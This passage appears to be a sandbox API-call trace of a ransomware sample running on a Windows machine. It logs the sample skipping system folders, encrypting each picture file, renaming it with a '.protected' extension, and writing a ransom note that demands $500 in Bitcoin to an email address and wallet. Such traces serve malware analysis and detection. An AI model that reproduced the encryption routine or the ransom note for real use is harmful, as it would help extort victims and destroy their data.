(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg") returned 91 [0092.516] StrStrW (lpFirst="LDad1G.jpg", lpSrch=".rar") returned 0x0 [0092.517] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg") returned 91 [0092.517] StrStrW (lpFirst="LDad1G.jpg", lpSrch=".zip") returned 0x0 [0092.517] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.517] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.517] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.517] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.518] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.518] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.518] CloseHandle (hObject=0x14c) returned 1 [0092.518] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg.protected") returned 101 [0092.518] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ldad1g.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\LDad1G.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ldad1g.jpg.protected")) returned 1 [0092.519] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="Windows") returned -1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="Program Files") returned -1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="Program Files (x86)") returned -1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="$Recycle.bin") returned 1 [0092.519] lstrcmpiW (lpString1="ny35po-7N9iv4z8.png", lpString2="System Volume Information") returned -1 [0092.519] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png") returned 100 [0092.519] StrStrIW (lpFirst="ny35po-7N9iv4z8.png", lpSrch=".protected") returned 0x0 [0092.519] lstrcmpW (lpString1="ny35po-7N9iv4z8.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ny35po-7n9iv4z8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png") returned 100 [0092.521] StrStrW (lpFirst="ny35po-7N9iv4z8.png", lpSrch=".txt") returned 0x0 [0092.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png") returned 100 [0092.521] StrStrW (lpFirst="ny35po-7N9iv4z8.png", lpSrch=".rar") returned 0x0 [0092.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png") returned 100 [0092.521] StrStrW (lpFirst="ny35po-7N9iv4z8.png", lpSrch=".zip") returned 0x0 [0092.521] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.522] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.522] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.522] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.522] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.522] WriteFile (in: 
hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.522] CloseHandle (hObject=0x14c) returned 1 [0092.522] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png.protected") returned 110 [0092.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ny35po-7n9iv4z8.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\ny35po-7N9iv4z8.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\ny35po-7n9iv4z8.png.protected")) returned 1 [0092.524] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0092.524] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0092.525] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\RESTORE_FILES.txt") returned 98 [0092.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\gS6abvkesfur\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\gs6abvkesfur\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.527] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.527] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0092.527] lstrlenA (lpString="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") returned 684 [0092.527] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0092.528] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.528] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0092.528] CloseHandle (hObject=0xd8) returned 1 [0092.528] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="Windows") returned -1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="Program Files") returned 1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="Program Files (x86)") returned 1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="$Recycle.bin") returned 1 [0092.528] lstrcmpiW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="System Volume Information") returned 1 [0092.528] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif") returned 86 [0092.528] StrStrIW (lpFirst="vnF7-eNcBmIDoq.gif", lpSrch=".protected") returned 0x0 [0092.528] lstrcmpW (lpString1="vnF7-eNcBmIDoq.gif", lpString2="RESTORE_FILES.txt") returned 1 [0092.528] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.528] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o 
s0\\2vqh2v9xe6lvg09j5nu\\vnf7-encbmidoq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif") returned 86 [0092.529] StrStrW (lpFirst="vnF7-eNcBmIDoq.gif", lpSrch=".txt") returned 0x0 [0092.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif") returned 86 [0092.529] StrStrW (lpFirst="vnF7-eNcBmIDoq.gif", lpSrch=".rar") returned 0x0 [0092.529] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif") returned 86 [0092.529] StrStrW (lpFirst="vnF7-eNcBmIDoq.gif", lpSrch=".zip") returned 0x0 [0092.529] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.529] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.530] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.530] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.530] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.530] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.530] CloseHandle (hObject=0xd8) returned 1 [0092.530] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif.protected") returned 96 [0092.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vnf7-encbmidoq.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vnF7-eNcBmIDoq.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vnf7-encbmidoq.gif.protected")) returned 1 [0092.531] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="Windows") returned -1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="Program Files") returned 1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="Program Files (x86)") returned 1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="$Recycle.bin") returned 1 [0092.531] lstrcmpiW (lpString1="vqMP9d.jpg", lpString2="System Volume Information") returned 1 [0092.531] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg") returned 78 [0092.531] StrStrIW (lpFirst="vqMP9d.jpg", lpSrch=".protected") returned 0x0 [0092.531] lstrcmpW (lpString1="vqMP9d.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0092.531] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.531] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vqmp9d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg") returned 78 [0092.532] StrStrW (lpFirst="vqMP9d.jpg", lpSrch=".txt") returned 0x0 [0092.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg") returned 78 [0092.532] StrStrW (lpFirst="vqMP9d.jpg", lpSrch=".rar") returned 0x0 [0092.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg") returned 78 [0092.532] StrStrW (lpFirst="vqMP9d.jpg", lpSrch=".zip") returned 0x0 [0092.532] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.533] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.533] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.533] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.533] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, 
lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.533] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.533] CloseHandle (hObject=0xd8) returned 1 [0092.533] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg.protected") returned 88 [0092.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vqmp9d.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\vqMP9d.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\vqmp9d.jpg.protected")) returned 1 [0092.534] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.534] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.535] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\RESTORE_FILES.txt") returned 85 [0092.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\2VqH2V9xe6lVG09j5Nu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\2vqh2v9xe6lvg09j5nu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.536] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.536] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.536] lstrlenA (lpString="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") returned 684 [0092.536] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.536] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.536] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.536] CloseHandle (hObject=0xd4) returned 1 [0092.537] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="Windows") returned -1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="Program Files") returned -1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="Program Files (x86)") returned -1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="$Recycle.bin") returned 1 [0092.537] lstrcmpiW (lpString1="FgnlkCw.png", lpString2="System Volume Information") returned -1 [0092.537] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png") returned 59 [0092.537] StrStrIW (lpFirst="FgnlkCw.png", lpSrch=".protected") returned 0x0 [0092.537] lstrcmpW (lpString1="FgnlkCw.png", lpString2="RESTORE_FILES.txt") returned -1 [0092.537] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.537] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o s0\\FgnlkCw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o s0\\fgnlkcw.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
